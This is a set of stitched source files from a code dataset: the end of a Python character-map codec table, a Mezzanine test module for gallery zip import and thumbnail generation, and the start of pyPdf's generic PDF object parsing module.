u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\xa5' # 0xA5 -> YEN SIGN
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\xaa' # 0xAA -> FEMININE ORDINAL INDICATOR
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xaf' # 0xAF -> MACRON
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\xba' # 0xBA -> MASCULINE ORDINAL INDICATOR
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xbf' # 0xBF -> INVERTED QUESTION MARK
u'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\u011e' # 0xD0 -> LATIN CAPITAL LETTER G WITH BREVE
u'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u0130' # 0xDD -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u015e' # 0xDE -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
u'\u011f' # 0xF0 -> LATIN SMALL LETTER G WITH BREVE
u'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
u'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
u'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u0131' # 0xFD -> LATIN SMALL LETTER DOTLESS I
u'\u015f' # 0xFE -> LATIN SMALL LETTER S WITH CEDILLA
u'\xff' # 0xFF -> LATIN SMALL LETTER Y WITH DIAERESIS
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| mit |
molokov/mezzanine | mezzanine/galleries/tests.py | 54 | 2140 | from __future__ import unicode_literals
from future.builtins import str
from future.utils import native
import os
from shutil import rmtree
from uuid import uuid4
from mezzanine.conf import settings
from mezzanine.core.templatetags.mezzanine_tags import thumbnail
from mezzanine.galleries.models import Gallery, GALLERIES_UPLOAD_DIR
from mezzanine.utils.tests import TestCase, copy_test_to_media
class GalleriesTests(TestCase):
def test_gallery_import(self):
"""
Test that a gallery creates images when given a zip file to
import, and that descriptions are created.
"""
zip_name = "gallery.zip"
copy_test_to_media("mezzanine.core", zip_name)
title = native(str(uuid4())) # i.e. Py3 str / Py2 unicode
gallery = Gallery.objects.create(title=title, zip_import=zip_name)
images = list(gallery.images.all())
self.assertTrue(images)
self.assertTrue(all([image.description for image in images]))
# Clean up.
rmtree(os.path.join(settings.MEDIA_ROOT,
GALLERIES_UPLOAD_DIR, title))
def test_thumbnail_generation(self):
"""
Test that a thumbnail is created and resized.
"""
try:
from PIL import Image
except ImportError:
return
image_name = "image.jpg"
size = (24, 24)
copy_test_to_media("mezzanine.core", image_name)
thumb_name = os.path.join(settings.THUMBNAILS_DIR_NAME, image_name,
image_name.replace(".", "-%sx%s." % size))
thumb_path = os.path.join(settings.MEDIA_ROOT, thumb_name)
thumb_image = thumbnail(image_name, *size)
self.assertEqual(os.path.normpath(thumb_image.lstrip("/")), thumb_name)
self.assertNotEqual(os.path.getsize(thumb_path), 0)
thumb = Image.open(thumb_path)
self.assertEqual(thumb.size, size)
# Clean up.
del thumb
os.remove(os.path.join(settings.MEDIA_ROOT, image_name))
os.remove(os.path.join(thumb_path))
rmtree(os.path.join(os.path.dirname(thumb_path)))
| bsd-2-clause |
ahu-odoo/odoo | openerp/report/pyPdf/generic.py | 136 | 29129 | # vim: sw=4:expandtab:foldmethod=marker
#
# Copyright (c) 2006, Mathieu Fenniak
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Implementation of generic PDF objects (dictionary, number, string, and so on)
"""
__author__ = "Mathieu Fenniak"
__author_email__ = "[email protected]"
import re
from utils import readNonWhitespace, RC4_encrypt
import filters
import utils
import decimal
import codecs
def readObject(stream, pdf):
tok = stream.read(1)
stream.seek(-1, 1) # reset to start
if tok == 't' or tok == 'f':
# boolean object
return BooleanObject.readFromStream(stream)
elif tok == '(':
# string object
return readStringFromStream(stream)
elif tok == '/':
# name object
return NameObject.readFromStream(stream)
elif tok == '[':
# array object
return ArrayObject.readFromStream(stream, pdf)
elif tok == 'n':
# null object
return NullObject.readFromStream(stream)
elif tok == '<':
# hexadecimal string OR dictionary
peek = stream.read(2)
stream.seek(-2, 1) # reset to start
if peek == '<<':
return DictionaryObject.readFromStream(stream, pdf)
else:
return readHexStringFromStream(stream)
elif tok == '%':
# comment
while tok not in ('\r', '\n'):
tok = stream.read(1)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
return readObject(stream, pdf)
else:
# number object OR indirect reference
if tok == '+' or tok == '-':
# number
return NumberObject.readFromStream(stream)
peek = stream.read(20)
stream.seek(-len(peek), 1) # reset to start
if re.match(r"(\d+)\s(\d+)\sR[^a-zA-Z]", peek) is not None:
return IndirectObject.readFromStream(stream, pdf)
else:
return NumberObject.readFromStream(stream)
class PdfObject(object):
def getObject(self):
"""Resolves indirect references."""
return self
class NullObject(PdfObject):
def writeToStream(self, stream, encryption_key):
stream.write("null")
def readFromStream(stream):
nulltxt = stream.read(4)
if nulltxt != "null":
raise utils.PdfReadError, "error reading null object"
return NullObject()
readFromStream = staticmethod(readFromStream)
class BooleanObject(PdfObject):
def __init__(self, value):
self.value = value
def writeToStream(self, stream, encryption_key):
if self.value:
stream.write("true")
else:
stream.write("false")
def readFromStream(stream):
word = stream.read(4)
if word == "true":
return BooleanObject(True)
elif word == "fals":
stream.read(1)
return BooleanObject(False)
assert False
readFromStream = staticmethod(readFromStream)
class ArrayObject(list, PdfObject):
def writeToStream(self, stream, encryption_key):
stream.write("[")
for data in self:
stream.write(" ")
data.writeToStream(stream, encryption_key)
stream.write(" ]")
def readFromStream(stream, pdf):
arr = ArrayObject()
tmp = stream.read(1)
if tmp != "[":
raise utils.PdfReadError, "error reading array"
while True:
# skip leading whitespace
tok = stream.read(1)
while tok.isspace():
tok = stream.read(1)
stream.seek(-1, 1)
# check for array ending
peekahead = stream.read(1)
if peekahead == "]":
break
stream.seek(-1, 1)
# read and append obj
arr.append(readObject(stream, pdf))
return arr
readFromStream = staticmethod(readFromStream)
class IndirectObject(PdfObject):
def __init__(self, idnum, generation, pdf):
self.idnum = idnum
self.generation = generation
self.pdf = pdf
def getObject(self):
return self.pdf.getObject(self).getObject()
def __repr__(self):
return "IndirectObject(%r, %r)" % (self.idnum, self.generation)
def __eq__(self, other):
return (
other is not None and
isinstance(other, IndirectObject) and
self.idnum == other.idnum and
self.generation == other.generation and
self.pdf is other.pdf
)
def __ne__(self, other):
return not self.__eq__(other)
def writeToStream(self, stream, encryption_key):
stream.write("%s %s R" % (self.idnum, self.generation))
def readFromStream(stream, pdf):
idnum = ""
while True:
tok = stream.read(1)
if tok.isspace():
break
idnum += tok
generation = ""
while True:
tok = stream.read(1)
if tok.isspace():
break
generation += tok
r = stream.read(1)
if r != "R":
raise utils.PdfReadError("error reading indirect object reference")
return IndirectObject(int(idnum), int(generation), pdf)
readFromStream = staticmethod(readFromStream)
class FloatObject(decimal.Decimal, PdfObject):
def __new__(cls, value="0", context=None):
return decimal.Decimal.__new__(cls, str(value), context)
def __repr__(self):
if self == self.to_integral():
return str(self.quantize(decimal.Decimal(1)))
else:
# XXX: this adds useless extraneous zeros.
return "%.5f" % self
def writeToStream(self, stream, encryption_key):
stream.write(repr(self))
class NumberObject(int, PdfObject):
def __init__(self, value):
int.__init__(value)
def writeToStream(self, stream, encryption_key):
stream.write(repr(self))
def readFromStream(stream):
name = ""
while True:
tok = stream.read(1)
if tok != '+' and tok != '-' and tok != '.' and not tok.isdigit():
stream.seek(-1, 1)
break
name += tok
if name.find(".") != -1:
return FloatObject(name)
else:
return NumberObject(name)
readFromStream = staticmethod(readFromStream)
##
# Given a string (either a "str" or "unicode"), create a ByteStringObject or a
# TextStringObject to represent the string.
def createStringObject(string):
if isinstance(string, unicode):
return TextStringObject(string)
elif isinstance(string, str):
if string.startswith(codecs.BOM_UTF16_BE):
retval = TextStringObject(string.decode("utf-16"))
retval.autodetect_utf16 = True
return retval
else:
# This is probably a big performance hit here, but we need to
# convert string objects into the text/unicode-aware version if
# possible... and the only way to check if that's possible is
# to try. Some strings are strings, some are just byte arrays.
try:
retval = TextStringObject(decode_pdfdocencoding(string))
retval.autodetect_pdfdocencoding = True
return retval
except UnicodeDecodeError:
return ByteStringObject(string)
else:
raise TypeError("createStringObject should have str or unicode arg")
def readHexStringFromStream(stream):
stream.read(1)
txt = ""
x = ""
while True:
tok = readNonWhitespace(stream)
if tok == ">":
break
x += tok
if len(x) == 2:
txt += chr(int(x, base=16))
x = ""
if len(x) == 1:
x += "0"
if len(x) == 2:
txt += chr(int(x, base=16))
return createStringObject(txt)
def readStringFromStream(stream):
tok = stream.read(1)
parens = 1
txt = ""
while True:
tok = stream.read(1)
if tok == "(":
parens += 1
elif tok == ")":
parens -= 1
if parens == 0:
break
elif tok == "\\":
tok = stream.read(1)
if tok == "n":
tok = "\n"
elif tok == "r":
tok = "\r"
elif tok == "t":
tok = "\t"
elif tok == "b":
tok = "\b"
elif tok == "f":
tok = "\f"
elif tok == "(":
tok = "("
elif tok == ")":
tok = ")"
elif tok == "\\":
tok = "\\"
elif tok.isdigit():
# "The number ddd may consist of one, two, or three
# octal digits; high-order overflow shall be ignored.
# Three octal digits shall be used, with leading zeros
# as needed, if the next character of the string is also
# a digit." (PDF reference 7.3.4.2, p 16)
for i in range(2):
ntok = stream.read(1)
if ntok.isdigit():
tok += ntok
else:
break
tok = chr(int(tok, base=8))
elif tok in "\n\r":
# This case is hit when a backslash followed by a line
# break occurs. If it's a multi-char EOL, consume the
# second character:
tok = stream.read(1)
if not tok in "\n\r":
stream.seek(-1, 1)
# Then don't add anything to the actual string, since this
# line break was escaped:
tok = ''
else:
raise utils.PdfReadError("Unexpected escaped string")
txt += tok
return createStringObject(txt)
##
# Represents a string object where the text encoding could not be determined.
# This occurs quite often, as the PDF spec doesn't provide an alternate way to
# represent strings -- for example, the encryption data stored in files (like
# /O) is clearly not text, but is still stored in a "String" object.
class ByteStringObject(str, PdfObject):
##
# For compatibility with TextStringObject.original_bytes. This method
# returns self.
original_bytes = property(lambda self: self)
def writeToStream(self, stream, encryption_key):
bytearr = self
if encryption_key:
bytearr = RC4_encrypt(encryption_key, bytearr)
stream.write("<")
stream.write(bytearr.encode("hex"))
stream.write(">")
##
# Represents a string object that has been decoded into a real unicode string.
# If read from a PDF document, this string appeared to match the
# PDFDocEncoding, or contained a UTF-16BE BOM mark to cause UTF-16 decoding to
# occur.
class TextStringObject(unicode, PdfObject):
autodetect_pdfdocencoding = False
autodetect_utf16 = False
##
# It is occasionally possible that a text string object gets created where
# a byte string object was expected due to the autodetection mechanism --
# if that occurs, this "original_bytes" property can be used to
# back-calculate what the original encoded bytes were.
original_bytes = property(lambda self: self.get_original_bytes())
def get_original_bytes(self):
# We're a text string object, but the library is trying to get our raw
# bytes. This can happen if we auto-detected this string as text, but
# we were wrong. It's pretty common. Return the original bytes that
# would have been used to create this object, based upon the autodetect
# method.
if self.autodetect_utf16:
return codecs.BOM_UTF16_BE + self.encode("utf-16be")
elif self.autodetect_pdfdocencoding:
return encode_pdfdocencoding(self)
else:
raise Exception("no information about original bytes")
def writeToStream(self, stream, encryption_key):
# Try to write the string out as a PDFDocEncoding encoded string. It's
# nicer to look at in the PDF file. Sadly, we take a performance hit
# here for trying...
try:
bytearr = encode_pdfdocencoding(self)
except UnicodeEncodeError:
bytearr = codecs.BOM_UTF16_BE + self.encode("utf-16be")
if encryption_key:
bytearr = RC4_encrypt(encryption_key, bytearr)
obj = ByteStringObject(bytearr)
obj.writeToStream(stream, None)
else:
stream.write("(")
for c in bytearr:
if not c.isalnum() and c != ' ':
stream.write("\\%03o" % ord(c))
else:
stream.write(c)
stream.write(")")
class NameObject(str, PdfObject):
delimiterCharacters = "(", ")", "<", ">", "[", "]", "{", "}", "/", "%"
def __init__(self, data):
str.__init__(data)
def writeToStream(self, stream, encryption_key):
stream.write(self)
def readFromStream(stream):
name = stream.read(1)
if name != "/":
raise utils.PdfReadError, "name read error"
while True:
tok = stream.read(1)
if tok.isspace() or tok in NameObject.delimiterCharacters:
stream.seek(-1, 1)
break
name += tok
return NameObject(name)
readFromStream = staticmethod(readFromStream)
class DictionaryObject(dict, PdfObject):
def __init__(self, *args, **kwargs):
if len(args) == 0:
self.update(kwargs)
elif len(args) == 1:
arr = args[0]
# If we're passed a list/tuple, make a dict out of it
if not hasattr(arr, "iteritems"):
newarr = {}
for k, v in arr:
newarr[k] = v
arr = newarr
self.update(arr)
else:
raise TypeError("dict expected at most 1 argument, got 3")
def update(self, arr):
# note, a ValueError halfway through copying values
# will leave half the values in this dict.
for k, v in arr.iteritems():
self.__setitem__(k, v)
def raw_get(self, key):
return dict.__getitem__(self, key)
def __setitem__(self, key, value):
if not isinstance(key, PdfObject):
raise ValueError("key must be PdfObject")
if not isinstance(value, PdfObject):
raise ValueError("value must be PdfObject")
return dict.__setitem__(self, key, value)
def setdefault(self, key, value=None):
if not isinstance(key, PdfObject):
raise ValueError("key must be PdfObject")
if not isinstance(value, PdfObject):
raise ValueError("value must be PdfObject")
return dict.setdefault(self, key, value)
def __getitem__(self, key):
return dict.__getitem__(self, key).getObject()
##
# Retrieves XMP (Extensible Metadata Platform) data relevant to the
# this object, if available.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
# @return Returns a {@link #xmp.XmpInformation XmlInformation} instance
# that can be used to access XMP metadata from the document. Can also
# return None if no metadata was found on the document root.
def getXmpMetadata(self):
metadata = self.get("/Metadata", None)
if metadata is None:
return None
metadata = metadata.getObject()
import xmp
if not isinstance(metadata, xmp.XmpInformation):
metadata = xmp.XmpInformation(metadata)
self[NameObject("/Metadata")] = metadata
return metadata
##
# Read-only property that accesses the {@link
# #DictionaryObject.getXmpData getXmpData} function.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
xmpMetadata = property(lambda self: self.getXmpMetadata(), None, None)
def writeToStream(self, stream, encryption_key):
stream.write("<<\n")
for key, value in self.items():
key.writeToStream(stream, encryption_key)
stream.write(" ")
value.writeToStream(stream, encryption_key)
stream.write("\n")
stream.write(">>")
def readFromStream(stream, pdf):
tmp = stream.read(2)
if tmp != "<<":
raise utils.PdfReadError, "dictionary read error"
data = {}
while True:
tok = readNonWhitespace(stream)
if tok == ">":
stream.read(1)
break
stream.seek(-1, 1)
key = readObject(stream, pdf)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
value = readObject(stream, pdf)
if data.has_key(key):
# multiple definitions of key not permitted
raise utils.PdfReadError, "multiple definitions in dictionary"
data[key] = value
pos = stream.tell()
s = readNonWhitespace(stream)
if s == 's' and stream.read(5) == 'tream':
eol = stream.read(1)
# odd PDF file output has spaces after 'stream' keyword but before EOL.
# patch provided by Danial Sandler
while eol == ' ':
eol = stream.read(1)
assert eol in ("\n", "\r")
if eol == "\r":
# read \n after
stream.read(1)
# this is a stream object, not a dictionary
assert data.has_key("/Length")
length = data["/Length"]
if isinstance(length, IndirectObject):
t = stream.tell()
length = pdf.getObject(length)
stream.seek(t, 0)
data["__streamdata__"] = stream.read(length)
e = readNonWhitespace(stream)
ndstream = stream.read(8)
if (e + ndstream) != "endstream":
# (sigh) - the odd PDF file has a length that is too long, so
# we need to read backwards to find the "endstream" ending.
# ReportLab (unknown version) generates files with this bug,
# and Python users into PDF files tend to be our audience.
# we need to do this to correct the streamdata and chop off
# an extra character.
pos = stream.tell()
stream.seek(-10, 1)
end = stream.read(9)
if end == "endstream":
# we found it by looking back one character further.
data["__streamdata__"] = data["__streamdata__"][:-1]
else:
stream.seek(pos, 0)
raise utils.PdfReadError, "Unable to find 'endstream' marker after stream."
else:
stream.seek(pos, 0)
if data.has_key("__streamdata__"):
return StreamObject.initializeFromDictionary(data)
else:
retval = DictionaryObject()
retval.update(data)
return retval
readFromStream = staticmethod(readFromStream)
class StreamObject(DictionaryObject):
def __init__(self):
self._data = None
self.decodedSelf = None
def writeToStream(self, stream, encryption_key):
self[NameObject("/Length")] = NumberObject(len(self._data))
DictionaryObject.writeToStream(self, stream, encryption_key)
del self["/Length"]
stream.write("\nstream\n")
data = self._data
if encryption_key:
data = RC4_encrypt(encryption_key, data)
stream.write(data)
stream.write("\nendstream")
def initializeFromDictionary(data):
if data.has_key("/Filter"):
retval = EncodedStreamObject()
else:
retval = DecodedStreamObject()
retval._data = data["__streamdata__"]
del data["__streamdata__"]
del data["/Length"]
retval.update(data)
return retval
initializeFromDictionary = staticmethod(initializeFromDictionary)
def flateEncode(self):
if self.has_key("/Filter"):
f = self["/Filter"]
if isinstance(f, ArrayObject):
f.insert(0, NameObject("/FlateDecode"))
else:
newf = ArrayObject()
newf.append(NameObject("/FlateDecode"))
newf.append(f)
f = newf
else:
f = NameObject("/FlateDecode")
retval = EncodedStreamObject()
retval[NameObject("/Filter")] = f
retval._data = filters.FlateDecode.encode(self._data)
return retval
class DecodedStreamObject(StreamObject):
def getData(self):
return self._data
def setData(self, data):
self._data = data
class EncodedStreamObject(StreamObject):
def __init__(self):
self.decodedSelf = None
def getData(self):
if self.decodedSelf:
# cached version of decoded object
return self.decodedSelf.getData()
else:
# create decoded object
decoded = DecodedStreamObject()
decoded._data = filters.decodeStreamData(self)
for key, value in self.items():
if not key in ("/Length", "/Filter", "/DecodeParms"):
decoded[key] = value
self.decodedSelf = decoded
return decoded._data
def setData(self, data):
raise utils.PdfReadError, "Creating EncodedStreamObject is not currently supported"
class RectangleObject(ArrayObject):
def __init__(self, arr):
# must have four points
assert len(arr) == 4
# automatically convert arr[x] into NumberObject(arr[x]) if necessary
ArrayObject.__init__(self, [self.ensureIsNumber(x) for x in arr])
def ensureIsNumber(self, value):
if not isinstance(value, (NumberObject, FloatObject)):
value = FloatObject(value)
return value
def __repr__(self):
return "RectangleObject(%s)" % repr(list(self))
def getLowerLeft_x(self):
return self[0]
def getLowerLeft_y(self):
return self[1]
def getUpperRight_x(self):
return self[2]
def getUpperRight_y(self):
return self[3]
def getUpperLeft_x(self):
return self.getLowerLeft_x()
